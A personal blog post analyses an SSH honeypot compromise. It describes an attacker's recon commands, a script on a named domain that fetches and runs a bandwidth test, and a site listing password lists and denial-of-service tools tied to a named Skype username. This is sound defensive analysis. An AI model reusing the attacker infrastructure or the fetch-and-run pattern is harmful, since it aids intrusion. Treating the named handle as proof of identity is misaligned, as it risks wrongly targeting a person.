“We need to stop using the term ‘script kiddie’ and start respecting the attacker.”

I can’t remember if it was an article or a lecture, but the author made a valuable point: some of the most damaging breaches have been executed by people who used point-and-click tools. Point in case: Talk Talk, a large UK ISP, was breached in recent years by teenagers using third party scripts and tools¹. It didn’t require an in-depth understanding of web services, database design or SQL to breach these guys. A lesson all blue teamers can take away from this is clear: respect the attacker.

On the evening of 28th September, 2018, I deployed the Cowrie honeypot (it’s very good indeed) onto a Digital Ocean VPS. My honeypot was configured to permit all root logins with any password you like. The aim was to try capture some malware so that I can dabble in the effervescent hobby of reverse engineering. Within an hour of the newly deployed droplet my IP was already getting scanned.

Once a scanner had successfully logged in, its first job was to execute uname -a & lscpu. Fair enough, if I were an attacker, I would want to know some basic information about the box, and compose a list of the most interesting boxes I’ve got a handle on. I expected some legitimate traffic to soon follow but it was two days later on 30th September, before the interesting stuff started.

In the GIF below, you’ll see a playback of the commands executed by the attacker on the honeypot.

Yeah, perl doesn’t exist on this system and actually

You’ll notice that I haven’t tried to hide the attackers IP address, or the hostnames involved because there are lessons to be learned in hiding your tracks. In this case, the IP address ties back to Romania and the wget target is a whole ‘nother part of this story.

The point of the honeypot was to analyse some malware, but in the ethos of ‘respect your attacker’ I set out to analyse what the attacker wanted with my box.

So what’s behind nasapaul.com/ninfo?

nasapaul.com/ninfo — system information bash script

Simply put, ninfo was a bash script which outputs some metrics about the host you’ve compromised and then attempts to retrieve and execute nasapaul.com/v.py.

v.py, then, is nothing more than a speedtest.net check — measuring the servers bandwidth.

Why bother going out and checking the bandwidth of a compromised box?

As far as I can see, there’s only one reason you’re going to want a popped box’s bandwidth statistics, and that’s if you’re working on setting up a denial-of-service network.

What about that nasapaul.com domain as well? It was so overt that I might as well have messaged the attacker on Facebook and gave him a dressing down for making the game too easy.

This all looks very sketchy already

There’s a lot here to unpack but let’s focus on the highlights.

The second to fifth links along the top, are password lists, The last three links are IP ranges belonging to cloud hosting providers, and OSINT on the Huawei data centre. The five locations in white, pertain to tools that aunch denial of service attacks, two of which are recon tools that I’ve seen already, That Facebook logo does indeed link to someone’s profile page, but you cannot attribute owner of this website to the user of that profile page.

In the source code for this page, there is a Skype username: “paul.paul4121” which a little Google-fu will reveal a series of videos posted on Youtube of other boxes “paul.paul4121” has had a go at. I didn’t learn anything new there. The videos are of a user running the same scripts from earlier.

At this stage, I decided not to pull on the thread any further. There was no value beyond digging through the code and the tools — but remember: this was point and click effectively. I believe the attacker was contributing to, or involved with setting up a distributed denial of service network. Simply put, by setting up a honeypot and respecting my attacker, I was able to learn a little bit more about how a (badly organised) red teamer works.

¹ — Boy, 17, admits TalkTalk hacking offences: https://www.bbc.co.uk/news/uk-37990246